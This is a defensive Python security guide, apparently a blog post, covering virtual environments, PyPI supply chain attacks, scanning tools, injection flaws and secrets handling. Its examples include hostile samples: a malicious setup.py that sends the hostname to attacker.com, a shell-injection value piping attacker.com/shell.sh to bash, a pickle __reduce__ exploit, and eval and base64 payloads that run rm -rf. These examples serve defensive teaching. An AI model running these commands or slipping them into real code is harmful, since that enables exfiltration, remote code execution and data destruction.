Python is everywhere — scripting, automation, security tooling, data pipelines, web backends. That ubiquity comes with an attack surface that is easy to underestimate. Python’s design philosophy (batteries included, dynamic, flexible) creates categories of risk that simply do not exist in stricter languages.
This guide covers two scenarios: the risks you face when writing Python code, and the risks you face when downloading and running scripts or packages someone else wrote. Both matter, and the failure modes are different.
TL;DR
- Always use virtual environments — but understand that venv is not a sandbox: malicious code inside a venv can still read files, make network calls, and access your secrets
- PyPI has no pre-publication malware scanning — typosquatting, dependency confusion, and maintainer takeovers are active attack vectors
- Use
guarddogbefore installing unknown packages,pip-auditfor CVE scanning, andbanditfor your own codeeval(),exec(),pickle, andsubprocesswith user input are injection vulnerabilities, not just bad practice- Secrets in source code get committed, pushed, and leaked — use environment variables or a secrets manager
- Before running any downloaded script: read it, check its imports, and verify the package name character by character
Part 1: The Environment — Isolation Before Anything Else
Virtual Environments Are a Security Boundary, Not Just Convenience
Most Python developers know venvs prevent dependency conflicts. Fewer think of them as a security control — but they are.
What happens without a venv:
# No venv — pip installs globally, as your user or as rootpip install requests# Now requests (and anything it pulls in) has access to your system Python# and potentially to site-packages shared across all your projectsThe problems this creates:
-
Cross-project contamination — a malicious package installed for Project A is available to Project B. Venvs break this: each environment is isolated.
-
Privilege escalation via system Python — if you habitually run
sudo pip install, you’re installing third-party code with root privileges. Any malicious package that runs code at install time (viasetup.pyor PEP 517 hooks) executes as root. -
No clean uninstall path — without venvs, you cannot reliably remove a package and all its side effects. A compromised environment can be nuked and recreated; a contaminated system Python is harder to clean.
Always use a venv:
# Create and activatepython -m venv .venvsource .venv/bin/activate # Linux/macOS.venv\Scripts\activate # Windows
# Install inside the venv onlypip install requests
# Deactivate when donedeactivateModern projects should use pyproject.toml with a tool like uv or poetry that enforces isolation automatically. The point is the same: code you did not write runs in a contained environment where damage is limited.
Venv Is Not a Sandbox
This is the most common misconception about virtual environments: a venv does not restrict what code can do at the OS level.
A malicious package installed inside a venv can still:
- Read any file your user account can read — including
~/.ssh/,~/.aws/credentials, browser cookie databases - Make outbound network connections to exfiltrate data
- Spawn subprocesses (
subprocess,os.system) - Read environment variables — including
AWS_SECRET_ACCESS_KEY,DATABASE_URL, any secret you have set in your shell - Write or delete files anywhere your user has write access
- Access other venvs on the same machine
The venv boundary is a Python module namespace boundary, not an OS-level isolation boundary. It prevents package conflicts between projects. It does not prevent malicious code from running.
For actual isolation when running untrusted code, use Docker with restricted permissions:
# No network, no access to home directory, read-only filesystem except /tmpdocker run --rm \ --network none \ --read-only \ --tmpfs /tmp \ -v $(pwd)/suspicious_script.py:/script.py:ro \ python:3.12-slim python /script.pyThis is the difference: venv protects your project dependencies from each other. Docker (or a VM) protects your system from untrusted code.
The --user Flag Is Not a Safe Alternative
pip install --user installs to ~/.local/lib/python3.x/site-packages. This avoids root, but:
- It shares across all projects for that user
- It is included in
sys.pathby default, meaning a malicious package installed--usercan still affect all your Python processes - It still runs
setup.pyand build hooks with your full user privileges
Use venvs. --user is a compromise, not a solution.
Part 2: Package Security — What PyPI Won’t Catch for You
PyPI Has No Pre-Publication Malware Scanning
Anyone with a PyPI account can publish a package. There is no review process, no sandbox execution of install hooks before publication. PyPI does conduct post-hoc malware scanning and removes packages when discovered — but the window between publication and removal can be hours or days.
During that window, automated systems (CI/CD pipelines, Docker builds, developer laptops) may already have installed the package.
Typosquatting — One Character Away
Attackers register package names that are visually similar to popular packages:
| Legitimate | Typosquatted |
|---|---|
requests | request / requestss / requuests |
numpy | nunpy / nummpy / numpy-base |
Pillow | Pil / pillow-python |
boto3 | bot03 (zero not O) / boto |
pycrypto | py-crypto / pycrypt0 |
The malicious package usually works as expected — it installs the real library as a dependency and adds its own malicious code on top. The victim sees no errors.
How to protect yourself:
# Always verify the exact package name on pypi.org before installing# Check: publication date, download count, maintainer history
# Use pip-audit to scan installed packages for known vulnerabilitiespip install pip-auditpip-audit
# Use our own gate-cli for supply chain risk scoringpip install gate-cligate scan requests numpy pandasDependency Confusion
If your internal package registry serves packages by name, and a package with that name also exists on PyPI, pip may fetch the PyPI version instead of your internal one — especially if the PyPI version has a higher version number.
Attackers register public PyPI packages with names that match internal corporate package names. When a developer or CI pipeline runs pip install, they get the attacker’s package.
Mitigation:
# pip.conf — explicitly scope internal packages to your private registry[global]index-url = https://your-internal-registry/simple/extra-index-url = https://pypi.org/simple/
# Better: use --no-index for packages that should only come from internal sourcespip install --no-index --find-links=./vendor/ internal-packagesetup.py and Build Hook Execution at Install Time
When you run pip install somepackage, pip may execute setup.py or PEP 517 build hooks — before you have reviewed any code. This is arbitrary code execution by design.
# A malicious setup.py — runs at pip install timefrom setuptools import setupimport subprocess
# This executes during `pip install`subprocess.run(["curl", "https://attacker.com/exfil?host=$(hostname)", "-s"], capture_output=True)
setup(name="totally-legitimate-package", ...)For untrusted packages: use pip install --no-build-isolation combined with reviewing source first, or use pip download to fetch the wheel without installing, then inspect before installing.
Pinning Dependencies — Version Locking Is a Security Control
Floating dependencies (requests>=2.0) will install whatever is current at the time. If a package is later compromised (maintainer account takeover, malicious release), your next pip install or Docker build fetches the compromised version.
# Bad — installs whatever is latestrequests>=2.28.0
# Better — pins exact versionrequests==2.31.0
# Best — pins version AND hash# Generate with:pip-compile --generate-hashes requirements.inHash pinning means pip refuses to install a package whose content does not match the recorded hash — even if the version number is the same. It makes supply chain substitution attacks significantly harder.
Part 3: Scanning Tools — What to Use and When
No single tool catches everything. The tooling landscape splits into three distinct categories that solve different problems — use all three.
Category 1: Vulnerability Scanners (Known CVEs)
These check whether your installed packages have known, published vulnerabilities. They are fast, reliable, and catch the easy stuff — but they are useless against a new malicious package that has no CVE yet.
pip-audit — the current standard, maintained by PyPA (the Python Packaging Authority):
pip install pip-audit
# Scan current environmentpip-audit
# Scan a requirements file without installingpip-audit -r requirements.txt
# Output as JSON for CIpip-audit --format json -o audit-results.jsonSafety — uses the PyPI Safety DB, good second opinion:
pip install safetysafety checksafety check -r requirements.txtSnyk — commercial with a free tier, strongest CI/CD integration, pulls from multiple vulnerability databases including its own:
npm install -g snyk # yes, installed via npmsnyk authsnyk test --file=requirements.txtSnyk’s advantage: it tracks transitive dependencies (dependencies of dependencies) and can suggest upgrade paths that fix multiple issues at once. It also monitors your project continuously and alerts when new CVEs are published against your locked versions.
Trivy — broad scanner (containers, filesystems, repos), useful when Python is one part of a larger stack:
# Scan a directory containing requirements.txt or Pipfile.locktrivy fs .
# Scan a Docker image that contains Python packagestrivy image my-python-app:latestCategory 2: Malicious Package Detectors (Behavioral Analysis)
These look for suspicious patterns in package code — network calls in setup.py, obfuscated strings, credential-harvesting patterns, unusual file system access. This is what catches typosquats and supply chain attacks that have no CVE.
guarddog (Datadog) — the strongest open source tool in this category:
pip install guarddog
# Scan before installing — downloads and inspects without executingguarddog pypi verify requestsguarddog pypi verify numpy==1.24.0
# Scan a requirements fileguarddog pypi verify -r requirements.txtguarddog checks for: setup.py network calls, cmd execution at install time, obfuscated code (base64 + exec patterns), credential file access, reverse shell patterns, and more. It inspects the package source without running it.
gate-cli — our own supply chain scanner, covers quarantine window risk (newly published packages with few downloads are statistically more likely to be malicious):
pip install gate-cligate scan requests numpy pandasgate scan -r requirements.txtgate focuses on signals that CVE scanners miss: publication recency, maintainer reputation, download velocity anomalies, and install-hook presence.
What these tools cannot do: detect a package that installs cleanly and only activates malicious behavior at runtime under specific conditions (e.g., when AWS_PROFILE is set, or when run on a CI server). That class of attack requires behavioral monitoring at runtime.
Category 3: Static Analysis for Your Own Code
These scan code you wrote for security vulnerabilities — injection risks, hardcoded secrets, insecure function use. They do not scan third-party packages.
Bandit — Python-specific, catches the issues covered in Part 4 of this article:
pip install bandit
# Scan a file or directorybandit -r myproject/
# High severity onlybandit -r myproject/ -l -i
# Output as JSON for CIbandit -r myproject/ -f json -o bandit-report.jsonBandit flags: eval() and exec() calls, subprocess with shell=True, pickle usage, hardcoded passwords, weak cryptography, SQL injection patterns, and more. False positive rate is low enough for CI enforcement.
Semgrep — more powerful, supports custom rules, good for team-wide enforcement:
pip install semgrep
# Run with the Python security rulesetsemgrep --config=p/python-security .
# Run the OWASP Top 10 rulesetsemgrep --config=p/owasp-top-ten .Semgrep’s advantage: you can write custom rules for your codebase. If your project has a pattern that should never appear (e.g., direct SQL string concatenation), write a rule for it once and it becomes part of every developer’s pre-commit check.
Recommended Workflow
| Stage | Tool | What it catches |
|---|---|---|
Before pip install | guarddog pypi verify | Malicious packages, behavioral patterns |
| After install / in CI | pip-audit | Known CVEs in dependencies |
| In CI (deeper) | snyk test | CVEs + transitive deps + upgrade paths |
| Pre-commit / CI | bandit | Security issues in your own code |
| Pre-commit / CI | semgrep | Custom rules + OWASP patterns |
| Container builds | trivy image | Full stack: OS packages + Python |
For production projects, run at minimum pip-audit + bandit in CI. Add guarddog for any project that installs packages dynamically or from less-known sources. Snyk is worth the free-tier signup for projects with complex dependency trees.
Part 4: Code You Write — The Python Injection Landscape
eval() and exec() — Injection by Design
eval() executes any Python expression. exec() executes any Python statement. If either receives user-controlled input, you have arbitrary code execution.
# Vulnerable — user can pass: "__import__('os').system('rm -rf ~')"user_input = input("Enter a formula: ")result = eval(user_input)
# Vulnerable exec — user can define and run anythingexec(user_input)There is no safe way to sandbox eval() or exec() with user input in standard CPython. The __builtins__ restriction approach has been bypassed repeatedly.
The fix: don’t use them on user input. Use ast.literal_eval() if you need to parse Python literals (strings, numbers, lists, dicts) — it raises ValueError on anything that is not a literal value.
import ast
# Safe — only evaluates literals, raises ValueError on codedata = ast.literal_eval(user_input)pickle — Deserialization Is Code Execution
Python’s pickle module serializes and deserializes Python objects. Deserializing a pickle payload executes Python code — the object’s __reduce__ method runs during loading.
import pickle, os
class Exploit: def __reduce__(self): return (os.system, ("whoami",))
# This executes os.system("whoami") on the machine that loads itpayload = pickle.dumps(Exploit())
# On the victim's machine:pickle.loads(payload) # ← arbitrary code executionNever unpickle data from untrusted sources. This includes: files uploaded by users, data from external APIs, inter-service messages if the sender is not fully trusted.
Safe alternatives:
json— for data exchange (no code execution risk)msgpack— for binary serializationprotobuf— for typed inter-service communication
# Instead of pickle for data exchange:import jsondata = json.dumps(my_object)restored = json.loads(data)subprocess — Shell Injection
subprocess.run() with shell=True passes the command to /bin/sh — if any part of the command includes user input, you have shell injection.
# Vulnerable — user input is "filename; curl attacker.com/shell.sh | bash"filename = request.args.get("file")subprocess.run(f"cat {filename}", shell=True)
# Safe — pass as list, no shell interpolationsubprocess.run(["cat", filename], shell=False)Rule: never use shell=True with any variable content. Pass arguments as a list. subprocess with a list does not invoke a shell — each element is passed as a literal argument to the executable.
Path Traversal
File operations with user-supplied paths can reach outside the intended directory:
# Vulnerable — user passes "../../etc/passwd"filename = request.args.get("file")with open(f"/var/data/uploads/{filename}") as f: return f.read()Fix: resolve the final path and verify it is still inside the intended root:
from pathlib import Path
BASE_DIR = Path("/var/data/uploads").resolve()requested = (BASE_DIR / filename).resolve()
if not requested.is_relative_to(BASE_DIR): raise PermissionError("Path traversal attempt")
with open(requested) as f: return f.read()Part 4: Secrets — The Leak That Keeps on Leaking
Hardcoded Credentials Are a Permanent Vulnerability
Secrets committed to source code get into git history. Even if you remove them in the next commit, they exist in every clone made before that commit — and in the history that git log reveals.
# This is in your git history foreverAPI_KEY = "sk-live-xxxxxxxxxxxxxxxxxxx"DB_PASSWORD = "SuperSecret123!"The fix: environment variables or a secrets manager, never source code.
import os
# Load from environmentAPI_KEY = os.environ["API_KEY"]DB_PASSWORD = os.environ["DB_PASSWORD"]
# Or use python-dotenv for development (never commit the .env file)from dotenv import load_dotenvload_dotenv()API_KEY = os.getenv("API_KEY")# .gitignore — add before first commit.env*.env.env.localsecrets.jsonIf you have already committed a secret: rotate it immediately. Removing it from the current commit does not help — the secret is in history and in every existing clone.
Pre-commit scanning:
# Install detect-secrets to catch secrets before they hit the repopip install detect-secretsdetect-secrets scan > .secrets.baselinedetect-secrets audit .secrets.baselinePart 5: Before You Run a Downloaded Script
Downloaded scripts (from GitHub, gists, blog posts, Reddit) deserve a read-through before execution. The checklist:
1. Check the imports
# Red flags in a script claiming to be a "system cleaner"import subprocessimport socketimport base64import osAny script that imports socket, subprocess, and base64 together without a clear reason is suspicious. Network + shell execution + encoding is a common malware pattern.
2. Look for obfuscation
# Red flags — obfuscated payloadexec(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))
# Decode it before running anythingimport base64print(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))# → b'import os; os.system("rm -rf /")'3. Run in a disposable environment
For any script you are not fully confident about, run it in a Docker container or VM with no access to your credentials, home directory, or network:
# Disposable container — script cannot reach your files or credentialsdocker run --rm --network none -v $(pwd)/script.py:/script.py python:3.12-slim python /script.py4. Verify package names character by character
Before pip install anything-from-a-blog-post: go to pypi.org/project/anything-from-a-blog-post and verify:
- The package exists
- The publication date is not from yesterday with 3 downloads
- The maintainer has a history
- The description matches what was advertised
Quick Reference Checklist
| Area | What to do |
|---|---|
| Environments | Always use venv; never sudo pip install |
| Venv ≠ sandbox | Venv isolates modules, not OS access — use Docker for real isolation |
| Dependencies | Pin versions; use hash verification for production |
| Package names | Verify on pypi.org before installing; check character by character |
| Install hooks | Know that setup.py runs at install time — use guarddog first |
| Scanning: malicious | guarddog pypi verify <package> before installing unknowns |
| Scanning: CVEs | pip-audit in CI; Snyk for transitive dependency tracking |
| Scanning: your code | bandit + semgrep in CI or pre-commit |
eval / exec | Never on user input; use ast.literal_eval for literals |
pickle | Never deserialize untrusted data |
subprocess | Never shell=True with variable content; pass as list |
| Path operations | Resolve and validate paths stay within intended root |
| Secrets | Environment variables only; .gitignore your .env; rotate anything committed |
| Downloaded scripts | Read before running; check imports; run in Docker with --network none |
Related Posts
- We Built a Supply Chain Scanner — Here’s What We Learned — gate-cli scans pip and npm packages for supply chain risk before you install them
- The Package You Trusted: How the Axios Supply Chain Attack Happened — real-world supply chain attack anatomy; the same patterns apply to PyPI
- LOLBins in 2026: How Attackers Use Windows Against Itself —
subprocessabuse in Python is the scripting equivalent of LOLBin abuse at the OS level - Invisible Characters as an Attack Vector — Unicode injection in code applies directly to Python scripts in repositories
- GitHub Secrets Management Crisis — what happens when secrets make it into source code at scale